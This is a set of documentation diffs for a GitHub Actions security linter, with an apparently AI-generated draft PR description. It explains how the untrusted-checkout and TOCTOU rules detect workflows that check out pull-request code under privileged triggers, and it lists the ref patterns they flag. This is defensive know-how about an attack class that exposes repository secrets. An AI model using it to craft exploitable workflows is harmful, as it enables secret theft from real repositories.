 - **Older repositories (created before February 2023)** default to `write-all`, in which case the token can mutate code, releases, and packages.
 
-Both cases are exploitable — the *primary* danger of the rule is secret exposure, not token writability. This nuance is verified live: `sisaku-security/workflow-probe:results/issue-comment-privileged.md` (2026-05-24) shows `GITHUB_TOKEN` resolves with length 40 under `issue_comment`, can read contents but returns `403` on issues / actions / pulls under the new default.
+Both cases are exploitable — the *primary* danger of the rule is secret exposure, not token writability. Under `issue_comment`, `GITHUB_TOKEN` resolves and can read repository contents, but on newer repositories (post-February-2023 default) it returns `403` on issues / actions / pulls unless the workflow declares those scopes explicitly.
 
 ### References
 

--- a/content/docs/rules/untrustedcheckout.md
+++ b/content/docs/rules/untrustedcheckout.md
@@ -5,7 +5,9 @@ weight: 1
 
 ### Untrusted Checkout Rule Overview
 
-This rule detects when workflows with privileged triggers check out untrusted code from pull requests. This is a **critical security vulnerability** (CVSS 9.3) that allows attackers to exfiltrate secrets or compromise the repository.
+This rule detects when workflows with privileged triggers check out untrusted code from pull requests, which can allow attackers to exfiltrate secrets or compromise the repository.
+
+The upstream CodeQL canonical query (`actions-untrusted-checkout-critical`) classifies this attack at `Security severity: 9.3 / Severity: error / Precision: very-high` and maps it to **CWE-829: Inclusion of Functionality from Untrusted Control Sphere**. sisakulint inherits the same attack model but currently emits **no in-message severity token** — the rule name has no `-critical`/`-medium` suffix and the diagnostic carries no `(critical)` token. Treat the CodeQL severity as the canonical reference until a sisakulint-side severity emit policy is finalized.
 
 **Vulnerable Example:**
 
@@ -26,7 +28,7 @@ jobs:
 **Detection Output:**
 
 ```bash
-vulnerable.yaml:9:16: checking out untrusted code from pull request in workflow with privileged trigger 'pull_request_target' (line 2). This allows potentially malicious code from external contributors to execute with access to repository secrets. Use 'pull_request' trigger instead, or avoid checking out PR code when using 'pull_request_target'. See https://codeql.github.com/codeql-query-help/actions/actions-untrusted-checkout-critical/ for more details [untrusted-checkout]
+vulnerable.yaml:9:16: checking out untrusted code from pull request in workflow with privileged trigger 'pull_request_target' (line 2). This allows potentially malicious code from external contributors to execute with access to repository secrets. Use 'pull_request' trigger instead, or avoid checking out PR code when using 'pull_request_target'. See https://sisaku-security.github.io/lint/docs/rules/untrustedcheckout/ for more details [untrusted-checkout]
       9 👈|          ref: ${{ github.event.pull_request.head.sha }}
 ```
 
@@ -76,46 +78,37 @@ jobs:
 
 ### Technical Detection Mechanism
 
-The rule performs three-step detection:
+The rule performs a three-pass analysis. The pseudocode below mirrors the actual call sites (`pkg/core/untrustedcheckout.go`) rather than a paraphrased sketch.
 
-**Step 1: Identify Privileged Triggers**
+**Pass 1 (`VisitWorkflowPre`): collect privileged triggers and per-job narrowing**
 
 ```go
-// In VisitWorkflowPre
-for _, event := range workflow.On {
-    if webhookEvent, ok := event.(*ast.WebhookEvent); ok {
-        triggerName := webhookEvent.EventName()
-        switch triggerName {
-        case "pull_request_target", "issue_comment", "workflow_run":
-            // Mark workflow as having dangerous trigger
-            rule.hasDangerousTrigger = true
-        }
-    }
-}
+// Workflow-level triggers populate workflowTriggerInfos.
+// JobTriggerAnalyzer then narrows per-job triggers using job-level
+// if: conditions so that a guarded job only inherits the triggers
+// its condition actually permits. Results are stored per-job in
+// jobHasDangerousTrigger (NOT on a workflow-wide flag).
 ```
 
-**Step 2: Find Checkout Actions**
+**Pass 2 (`VisitJobPre`): record dangerous-trigger position per job**
 
 ```go
-// In VisitStep
-if action, ok := step.Exec.(*ast.ExecAction); ok {
-    if strings.HasPrefix(action.Uses.Value, "actions/checkout@") {
-        // Found checkout action - check ref parameter
-    }
-}
+// For every job whose narrowed trigger set intersects
+// {pull_request_target, issue_comment, workflow_run, workflow_call},
+// remember dangerousTriggerPos / dangerousTriggerName so later
+// diagnostics can cite the originating trigger line:column.
 ```
 
-**Step 3: Analyze Ref Parameter**
+**Pass 3 (`VisitStep`): inspect `actions/checkout` ref**
 
 ```go
-// Check if ref points to PR HEAD
-refInput := action.Inputs["ref"]
-if refInput != nil && refInput.Value.ContainsExpression() {
-    // Parse expressions like ${{ github.event.pull_request.head.sha }}
-    if isUntrustedPRExpression(refInput.Value) {
-        // REPORT ERROR
-    }
-}
+// strings.HasPrefix(action.Uses.Value, "actions/checkout@")
+// → isUntrustedPRRef(refValue) → IsUnsafeCheckoutRef(refValue)
+//   does a CASE-INSENSITIVE substring scan against a list of
+//   ~8 known unsafe substrings (see "Untrusted Ref Patterns"
+//   below), AND treats any ${{ ... }} expression not present in
+//   the safe-patterns allowlist as unsafe ("conservative
+//   unknown expression" rule, see section below).
 ```
 
 ### Detection Logic Explanation
@@ -146,11 +139,26 @@ if refInput != nil && refInput.Value.ContainsExpression() {
 
 #### Untrusted Ref Patterns
 
-The rule detects these dangerous ref expressions:
+The rule's `IsUnsafeCheckoutRef` performs a **case-insensitive substring scan** over the literal text of the `ref:` input. Any ref whose value contains one of the following substrings is flagged. The list is illustrative of the dangerous shapes — the rule itself does not require an exact match.
 
-- `${{ github.event.pull_request.head.sha }}` - PR HEAD commit SHA
-- `${{ github.event.pull_request.head.ref }}` - PR HEAD branch reference
-- Any expression containing `github.event.pull_request.head.*`
+- `github.head_ref`
+- `github.event.pull_request.head.ref`
+- `github.event.pull_request.head.sha`
+- `github.event.pull_request.head.label`
+- `refs/pull/` (e.g. `refs/pull/123/head`)
+- `head_sha` (any `*.head_sha` reference)
+- `head-sha` (hyphenated variant from third-party actions)
+- Any other expression of the form `github.event.*.head.*`
+
+In addition, a **conservative-unknown-expression** rule applies (see next section).
+
+#### Conservative Unknown Expression
+
+Any `${{ ... }}` expression in the `ref:` input that does **not** appear in the safe-patterns allowlist (see *Safe Patterns* below) is treated as unsafe. This is intentionally conservative: a custom expression that the rule has no static knowledge of will be flagged rather than silently allowed. If you maintain a custom expression that is provably safe, prefer rewriting it to one of the known-safe forms or — as a temporary measure — disabling the rule on that file with a comment directive.
+
+#### Trigger Narrowing via Job-Level `if:`
+
+The rule does not assume that a privileged workflow trigger means every job is privileged. The `JobTriggerAnalyzer` honors job-level `if:` conditions when computing the set of triggers under which each job is analyzed — e.g. a job guarded by `if: github.event_name == 'push'` inside a `pull_request_target`-triggered workflow is analyzed as a `push` job only, and the untrusted-checkout diagnostic is suppressed accordingly.
 
 #### Safe Patterns
 
@@ -226,12 +234,25 @@ jobs:
 
 The rule has very few false positives because:
 
-1. It only triggers when **both** conditions are met (privileged trigger + untrusted checkout)
+1. It only triggers when **both** conditions are met (privileged trigger + untrusted checkout).
 2. Safe checkout patterns are explicitly allowed:
-   - No `ref` parameter (defaults to trigger SHA - safe)
-   - `ref: ${{ github.sha }}` (base branch - safe)
-   - `ref: main` (literal branch names - safe)
-   - `pull_request` trigger (no privileges - safe)
+   - No `ref` parameter (defaults to trigger SHA — safe)
+   - `ref: ${{ github.sha }}` (base branch — safe)
+   - `ref: ${{ github.base_ref }}` (base branch of the PR)
+   - `ref: ${{ github.event.pull_request.base.ref }}` (base ref of the PR)
+   - `ref: ${{ github.event.pull_request.base.sha }}` (base SHA of the PR)
+   - `ref: ${{ github.event.repository.default_branch }}` (repo default branch)
+   - `ref: main` (literal branch names — safe)
+   - `pull_request` trigger (no privileges — safe)
+
+### Trigger Privilege Nuance (`issue_comment`)
+
+Classifying `issue_comment` as privileged is correct in the sense that the workflow runs in the base-repo context and can resolve `secrets.*`. The exact scope of the resulting `GITHUB_TOKEN`, however, depends on the repository's "Workflow permissions" setting:
+
+- **Newer repositories (created after February 2023)** default to read-only `GITHUB_TOKEN` (Contents/Metadata/Packages). Other API surfaces (issues, actions, pulls) return `403` unless the workflow declares a `permissions:` block explicitly.
+- **Older repositories (created before February 2023)** default to `write-all`, in which case the token can mutate code, releases, and packages.
+
+Both cases are exploitable — the *primary* danger of the rule is secret exposure, not token writability. This nuance is verified live: `sisaku-security/workflow-probe:results/issue-comment-privileged.md` (2026-05-24) shows `GITHUB_TOKEN` resolves with length 40 under `issue_comment`, can read contents but returns `403` on issues / actions / pulls under the new default.
 
 ### References
 
@@ -281,6 +302,12 @@ jobs:
 
 **Note:** Auto-fix provides a safe default, but you should review whether your workflow actually needs to checkout code at all when using privileged triggers. Consider using the two-workflow pattern or removing the checkout step entirely if appropriate.
 
+> ⚠️ **Mixed-literal ref auto-fix is destructive.** If the existing `ref:` value mixes a literal prefix with an expression (e.g. `ref: 'pr-${{ github.event.pull_request.head.sha }}'`), the auto-fix **replaces the entire string** with `${{ github.sha }}`, including the literal prefix. The auto-fix does not warn before doing this. Review the diff before applying `-fix on` if your `ref:` values are not pure expressions.
+
+> Companion mitigation: combine the safer ref with `persist-credentials: false` on `actions/checkout`. The GitHub Security Lab "Preventing pwn-requests" research highlights `persist-credentials: false` as a critical defense in this attack class because it prevents the workflow's `GITHUB_TOKEN` from being persisted into the local `.git/config` where checked-out code (and any `pre-commit` hooks etc.) could read it.
+
+> The CodeQL canonical query also recommends the **`safe to test` label workflow** pattern: a guard step that runs only when a maintainer has added a `safe to test` label, gating the privileged path behind manual review. This pattern has a known TOCTOU risk if the PR head is updated after labeling — pair it with `untrusted-checkout-toctou-critical`/`high` for full coverage.
+
 ### Remediation Steps
 
 When this rule triggers:
@@ -306,5 +333,7 @@ When this rule triggers:
 
 For more information on securing GitHub Actions workflows, see:
 - [GitHub Actions Security Best Practices](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions)
-- [Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)
+- [Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) — GitHub Security Lab canonical research for this attack class
+- [CodeQL: `actions-untrusted-checkout-critical`](https://codeql.github.com/codeql-query-help/actions/actions-untrusted-checkout-critical/) — upstream canonical query (Severity 9.3, CWE-829)
+- [Living Off the Pipeline (LOTP) catalog](https://github.com/boostsecurityio/lotp) — broader catalog of CI/CD attack vectors referenced by the CodeQL query
 - [OWASP CI/CD Security Top 10](https://owasp.org/www-project-top-10-ci-cd-security-risks/)

--- a/content/docs/rules/untrustedcheckout.md
+++ b/content/docs/rules/untrustedcheckout.md
@@ -105,7 +105,7 @@ The rule performs a three-pass analysis. The pseudocode below mirrors the actual
 // strings.HasPrefix(action.Uses.Value, "actions/checkout@")
 // → isUntrustedPRRef(refValue) → IsUnsafeCheckoutRef(refValue)
 //   does a CASE-INSENSITIVE substring scan against a list of
-//   ~8 known unsafe substrings (see "Untrusted Ref Patterns"
+//   10 known unsafe substrings (see "Untrusted Ref Patterns"
 //   below), AND treats any ${{ ... }} expression not present in
 //   the safe-patterns allowlist as unsafe ("conservative
 //   unknown expression" rule, see section below).
@@ -139,16 +139,31 @@ The rule performs a three-pass analysis. The pseudocode below mirrors the actual
 
 #### Untrusted Ref Patterns
 
-The rule's `IsUnsafeCheckoutRef` performs a **case-insensitive substring scan** over the literal text of the `ref:` input. Any ref whose value contains one of the following substrings is flagged. The list is illustrative of the dangerous shapes — the rule itself does not require an exact match.
+The rule's `IsUnsafeCheckoutRef` performs a **case-insensitive substring scan** over the literal text of the `ref:` input. Any ref whose value contains one of the following substrings is flagged. The list below is **exhaustive** — these are the 10 substrings the rule actually scans for (defined as `unsafePatternsLower` in `cachepoisoningutil.go`).
 
-- `github.head_ref`
-- `github.event.pull_request.head.ref`
+**Full GitHub-context expressions** (the canonical PR-head refs):
+
 - `github.event.pull_request.head.sha`
-- `github.event.pull_request.head.label`
+- `github.event.pull_request.head.ref`
+- `github.head_ref`
+
+**Pull-request ref namespace**:
+
 - `refs/pull/` (e.g. `refs/pull/123/head`)
-- `head_sha` (any `*.head_sha` reference)
-- `head-sha` (hyphenated variant from third-party actions)
-- Any other expression of the form `github.event.*.head.*`
+
+**Dotted-suffix variants** (catches third-party action outputs that surface PR head info as `<step>.outputs.head_sha`, `<step>.outputs.head.ref`, etc.):
+
+- `.head.sha`
+- `.head.ref`
+- `.head_sha`
+- `.head_ref`
+
+**Hyphenated variants** (third-party actions that expose PR head info via kebab-case identifiers):
+
+- `head-sha`
+- `head-ref`
+
+> **Note on `head.label` and other head-derived refs**: `github.event.pull_request.head.label` is **not** in this substring list — the substring scan operates on literal text and does not interpret `*` wildcards (so a phrase like "any `github.event.*.head.*`" would be a routing fiction). However, `head.label` and any other `${{ ... }}` expression that is not on the safe-patterns allowlist is still flagged via the **conservative-unknown-expression** rule below. **Net coverage is therefore not weakened** by listing the substring scan exhaustively — `head.label` and similar head-derived expressions still flag, just through the conservative-unknown path rather than the substring scan.
 
 In addition, a **conservative-unknown-expression** rule applies (see next section).
 

--- a/content/docs/rules/untrustedcheckout.md
+++ b/content/docs/rules/untrustedcheckout.md
@@ -7,7 +7,7 @@ weight: 1
 
 This rule detects when workflows with privileged triggers check out untrusted code from pull requests, which can allow attackers to exfiltrate secrets or compromise the repository.
 
-The upstream CodeQL canonical query (`actions-untrusted-checkout-critical`) classifies this attack at `Security severity: 9.3 / Severity: error / Precision: very-high` and maps it to **CWE-829: Inclusion of Functionality from Untrusted Control Sphere**. sisakulint inherits the same attack model but currently emits **no in-message severity token** — the rule name has no `-critical`/`-medium` suffix and the diagnostic carries no `(critical)` token. Treat the CodeQL severity as the canonical reference until a sisakulint-side severity emit policy is finalized.
+CodeQL's published query (`actions-untrusted-checkout-critical`) classifies this attack at `Security severity: 9.3 / Severity: error / Precision: very-high` and maps it to **CWE-829: Inclusion of Functionality from Untrusted Control Sphere**. sisakulint addresses the same attack class but currently emits **no in-message severity token** — the rule name has no `-critical`/`-medium` suffix and the diagnostic carries no `(critical)` token. Treat the CodeQL severity as a cross-reference until a sisakulint-side severity emit policy is finalized.
 
 **Vulnerable Example:**
 
@@ -322,6 +322,6 @@ When this rule triggers:
 For more information on securing GitHub Actions workflows, see:
 - [GitHub Actions Security Best Practices](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions)
 - [Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) — GitHub Security Lab canonical research for this attack class
-- [CodeQL: `actions-untrusted-checkout-critical`](https://codeql.github.com/codeql-query-help/actions/actions-untrusted-checkout-critical/) — upstream canonical query (Severity 9.3, CWE-829)
+- [CodeQL: `actions-untrusted-checkout-critical`](https://codeql.github.com/codeql-query-help/actions/actions-untrusted-checkout-critical/) — CodeQL query (severity / CWE reference; Severity 9.3, CWE-829)
 - [Living Off the Pipeline (LOTP) catalog](https://github.com/boostsecurityio/lotp) — broader catalog of CI/CD attack vectors referenced by the CodeQL query
 - [OWASP CI/CD Security Top 10](https://owasp.org/www-project-top-10-ci-cd-security-risks/)

--- a/content/docs/rules/untrustedcheckouttoctoucritical.md
+++ b/content/docs/rules/untrustedcheckouttoctoucritical.md
@@ -31,9 +31,11 @@ jobs:
 **Detection Output:**
 
 ```bash
-vulnerable.yaml:14:11: TOCTOU vulnerability detected: workflow uses 'labeled' event type with mutable ref '${{ github.event.pull_request.head.ref }}' in checkout. An attacker can push malicious code after the label is applied. Use '${{ github.event.pull_request.head.sha }}' instead. See CWE-367 [untrusted-checkout-toctou/critical]
-     14 |          ref: ${{ github.event.pull_request.head.ref }}
+vulnerable.yaml:11:9: TOCTOU vulnerability: checkout uses mutable reference with 'labeled' event type on 'pull_request_target' trigger (line 4). An attacker can modify code after label approval. The checked-out code may differ from what was reviewed. Use immutable '${{ github.event.pull_request.head.sha }}' instead of mutable branch references. See https://sisaku-security.github.io/lint/docs/rules/untrustedcheckouttoctoucritical/ [untrusted-checkout-toctou/critical]
+     11 👈|      - uses: actions/checkout@v4
 ```
+
+The finding is anchored at the `actions/checkout` step, and the line number cited in the message points at the `labeled` event type declaration (`types: [labeled]` on line 4 in this example).
 
 ### Security Background
 
@@ -75,21 +77,45 @@ In the context of GitHub Actions:
 
 ### Detection Logic
 
+#### Trigger Coverage
+
+The rule scans workflows triggered by **`pull_request_target` or `pull_request`** when the trigger declares the `labeled` event type:
+
+```yaml
+on:
+  pull_request_target:   # detected
+    types: [labeled]
+```
+
+```yaml
+on:
+  pull_request:          # ALSO detected
+    types: [labeled]
+```
+
+`pull_request` (non-target) is covered because the same TOCTOU window exists there: the code that runs can differ from the code that was reviewed when the label was applied, even though the token is less privileged. The `types: [labeled]` declaration on the trigger is a **precondition** — workflows without it are not analyzed by this rule, even if individual jobs check for label events in their `if:` conditions.
+
 #### What Gets Detected
 
-1. **Labeled event with mutable ref checkout**
+Within a labeled-triggered workflow, the rule flags `actions/checkout` steps whose `ref:` contains a mutable reference:
+
+1. **PR head branch reference**
    ```yaml
-   on:
-     pull_request_target:
-       types: [labeled]
-   # ...
    ref: ${{ github.event.pull_request.head.ref }}
    ```
 
-2. **Branch name references**
+2. **Branch name reference**
    ```yaml
    ref: ${{ github.head_ref }}
    ```
+
+These are the **only two patterns detected** (matched as substrings of the `ref:` value). Other expressions — e.g. `${{ github.ref }}` or `${{ github.event.pull_request.head.label }}` — are **not** flagged by this rule.
+
+#### Trigger Narrowing via Job-Level `if:`
+
+The rule does not assume that a labeled workflow trigger means every job runs on it. When computing which jobs to analyze, it honors job-level `if:` conditions that constrain **`github.event_name`** — e.g. in a workflow triggered by both `pull_request_target: types: [labeled]` and `push`, a job guarded by `if: github.event_name == 'push'` can never run on the labeled trigger and is therefore not flagged.
+
+Note the narrowing operates on **event names only**. Conditions on the action type, such as `if: github.event.action == 'opened'`, are **not** interpreted — a job carrying such a condition is still analyzed (conservatively treated as reachable from the labeled trigger).
 
 #### Safe Patterns (NOT Detected)
 
@@ -106,6 +132,15 @@ Using `github.sha` for merged commit:
   with:
     ref: ${{ github.sha }}
 ```
+
+#### Relationship to the `untrusted-checkout` Rule
+
+This rule and the sibling [`untrusted-checkout`](../untrustedcheckout/) rule divide the untrusted-checkout problem space:
+
+- **This rule (`untrusted-checkout-toctou/critical`)** is scoped to the **label-approval TOCTOU window**: it fires only when a `labeled` event type gates the workflow *and* the checkout uses one of the two mutable-ref patterns above. The attack it models is "code changed between label approval and execution".
+- **`untrusted-checkout`** covers the general case: checking out PR-controlled code under a privileged trigger (`pull_request_target`, `issue_comment`, `workflow_run`, `workflow_call`), regardless of label gating, with a broader set of unsafe ref patterns.
+
+Both rules can fire on the same checkout step — a labeled `pull_request_target` workflow that checks out `github.head_ref` matches both scopes. Their auto-fixes differ (this rule rewrites the ref to `head.sha`; `untrusted-checkout` rewrites it to `github.sha`), so when applying `-fix`, review which rewrite ran.
 
 ### Auto-Fix
 
@@ -126,6 +161,8 @@ After running `sisakulint -fix on`:
   with:
     ref: ${{ github.event.pull_request.head.sha }}
 ```
+
+> ⚠️ **The replacement is a substring rewrite, not a whole-value rewrite.** Only the mutable expression inside the `ref:` value is swapped for `${{ github.event.pull_request.head.sha }}`; surrounding literal text is preserved. If your `ref:` mixes literals with the expression — e.g. `ref: prefix-${{ github.head_ref }}-suffix` — the result is `prefix-${{ github.event.pull_request.head.sha }}-suffix`, which is a valid YAML string but almost certainly not an existing git ref, so the checkout will fail at runtime. Preview with `-fix dry-run` before applying if your `ref:` values are not pure expressions.
 
 ### Remediation Steps
 


### PR DESCRIPTION
**Draft** — one open question (rule severity framing) should be settled here before this is marked ready.

## What this does

Corrects the canonical documentation for 5 rules so it matches what the code actually does. Each change was verified by running the rule against fixtures, reading the implementation, and (where a claim was about GitHub's own behavior) checking the official GitHub Actions docs and a live runner.

- **permissions**: add the permission scopes the code actually validates (`artifact-metadata`, `attestations`, `models`); correct the claim that `permissions: none` is valid at the top level (GitHub rejects it at parse time — the deny-all form is `permissions: {}`); document that the missing-permissions warning is suppressed for reusable workflows (`workflow_call`) and when every job declares its own permissions; document the auto-fix behavior; add the CWE-275 reference.
- **code-injection-critical**: soften absolute wording ("Zero" → "Low"); remove internal Go symbol names; reframe the CodeQL reference as a neutral cross-reference rather than an upstream lineage.
- **untrusted-checkout**: align the documented "untrusted ref" substring list to the actual list in code; remove internal symbols.
- **secret-exfiltration**: rewrite the per-command severity table to match the code; unify the severity labels; add a caveat that the trusted-domain allowlist is a false-positive-reduction heuristic, not a security boundary (an attacker-controlled endpoint on an allowed host can still receive data).
- **env-var-injection-critical**: correct the description of what the rule actually catches (the `$GITHUB_ENV` interpolation flow, not delimiter forgery itself).

Landing-page changes that were developed alongside these are intentionally kept out of this PR and will land separately, since they are a display-infrastructure change with a different review concern.

## Open question to settle before marking ready

**How should the `permissions` rule's severity be presented?**

Verified facts:
- The rule emits no severity token at all (no severity field, no parenthetical tag on any message).
- The previous doc said "High (7/10)", which has no traceable source.
- CodeQL's query for this class states `Security severity: 5.0` / `warning` / `precision high`.

This PR currently presents it as **"Warning (CodeQL canonical: 5.0)"**. The alternative is to present it as **"unclassified"** (emphasizing that the rule itself outputs nothing) and defer a numeric value.

This is really a project-wide decision about how every rule's severity should be shown in the docs (adopt CodeQL's value as the stated severity, vs. mark it unclassified until the code emits its own tag). Picking one here sets the pattern for the other rule docs. Requesting a decision before this goes out of draft.

---

🤖 Generated with [Claude Code](https://claude.com/claude-code)
